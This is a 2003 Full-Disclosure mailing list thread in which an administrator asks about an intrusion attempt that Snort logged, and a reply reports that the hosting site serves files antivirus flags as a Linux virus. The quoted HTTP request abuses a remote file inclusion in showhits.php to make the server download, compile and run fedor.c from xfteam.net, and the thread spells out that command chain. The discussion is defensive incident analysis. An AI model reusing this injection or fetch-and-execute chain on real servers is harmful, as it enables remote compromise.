[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <88001FC5C453764CA6597FB2987424942403DE@SVEX03.dutchtone.nl>
From: allan.vanleeuwen at orangemail.nl (allan.vanleeuwen@...ngemail.nl)
Subject: http://xfteam.net/fedor.c - Anyone seen thi
s before??
Well ...
Xfteam.net resolves fine for me ...(IP 69.56.243.146)
There's a website with a few files for download ... One of them was detected
as a linux virus by my NAV :)
There's a folder 'forum' which looks like a portugese hackers hideout ...
Not very much posted there though ...
My 2c.
-----Original Message-----
From: Dan [mailto:dan@...kedbox.net]
Sent: maandag 24 november 2003 10:28
To: full-disclosure@...ts.netsys.com
Subject: [Full-Disclosure] http://xfteam.net/fedor.c - Anyone seen this
before??
Hi,
Our Snort picked up an interesting attempt to download, compile and execute.
Noting also the fact that the sub dir its attempting to access has not been
there for over 4 months(/logjam/)?
Has anyone actually seen what this fedor.c is? I have done some google'ing
but
it comes up blank.
Has anyone else noticed this kindof request recently?
Is it just me or is xfteam.net not resolving anyway?
Orignal HTTP request:
GET /logjam/showhits.php?
rel_path=http://xfteam.net/cmd.txt?&cmd=uname%20-a;cd%20/tmp;wget%20http://x
fteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?&cmd=uname%20-a;cd%20/tmp;wget%
20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f
Breaking this down we get(twice):
uname -a
cd /tmp
wget http://xfteam.net/fedor.c
gcc -o f fedor.c
./f
Regards,
Daniel.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
===========================================================
De informatie opgenomen in dit bericht kan vertrouwelijk zijn en is alleen
bestemd voor de geadresseerde. Indien u dit bericht onterecht ontvangt,
wordt u verzocht de inhoud niet te gebruiken en de afzender direct te
informeren door het bericht te retourneren. Hoewel Orange maatregelen heeft
genomen om virussen in deze email of attachments te voorkomen, dient u ook
zelf na te gaan of virussen aanwezig zijn aangezien Orange niet
aansprakelijk is voor computervirussen die veroorzaakt zijn door deze
email..
The information contained in this message may be confidential and is
intended to be only for the addressee. Should you receive this message
unintentionally, please do not use the contents herein and notify the sender
immediately by return e-mail. Although Orange has taken steps to ensure that
this email and attachments are free from any virus, you do need to verify
the possibility of their existence as Orange can take no responsibility for
any computer virus which might be transferred by way of this email.
===========================================================
Powered by blists - more mailing lists